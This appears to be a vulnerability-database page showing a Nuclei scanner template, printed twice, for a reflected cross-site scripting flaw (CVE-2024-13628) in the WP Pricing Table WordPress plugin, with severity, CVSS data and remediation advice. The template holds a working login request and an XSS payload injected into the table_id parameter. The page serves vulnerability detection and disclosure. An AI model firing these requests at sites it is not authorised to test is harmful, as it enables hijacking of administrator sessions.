WP Pricing Table - Reflected XSS

CVE-2024-13628

Verified

Description

WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Published Date

February 7, 2026

Template Author

sourabh-sahu

CVE-2024-13628.yaml

id: CVE-2024-13628

info:
  name: WP Pricing Table - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.
  reference:
    - https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13628
    cwe-id: CWE-79
    epss-score: 0.01826
    epss-percentile: 0.83124
    cpe: cpe:2.3:a:codecabin:wp_pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/wp-pricing-table/"
  tags: cve,cve2024,codecabin,wp-pricing-table,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","wp-pricing-table")
        condition: and
# digest: 490a004630440220392388572c4e8b75e6cd9f2e511ddbe74219bd4776f30a2fb7c5a5e6749cfea002201960d10a8d416bf0f6eb3aa235349b6b4ef7b74b6afb42a82941ddaf5cbb5108:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-13628

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/

Remediation Steps

Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.

id: CVE-2024-13628

info:
  name: WP Pricing Table - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    WP Pricing Table WordPress plugin <= 1.1 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of WP Pricing Table plugin that addresses the vulnerability or apply security patches.
  reference:
    - https://wpscan.com/vulnerability/34d6c8a2-e70d-485c-a217-4a569c16b079/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13628
    cwe-id: CWE-79
    epss-score: 0.01826
    epss-percentile: 0.83124
    cpe: cpe:2.3:a:codecabin:wp_pricing_table:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    publicwww-query: "/plugins/wp-pricing-table/"
  tags: cve,cve2024,codecabin,wp-pricing-table,wordpress,wp,wp-plugin,authenticated,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wp-pricing-table-menu&action=new&table_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>","wp-pricing-table")
        condition: and
# digest: 490a004630440220392388572c4e8b75e6cd9f2e511ddbe74219bd4776f30a2fb7c5a5e6749cfea002201960d10a8d416bf0f6eb3aa235349b6b4ef7b74b6afb42a82941ddaf5cbb5108:922c64590222798bb761d5b6d8e72950

WP Pricing Table - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

WP Pricing Table - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps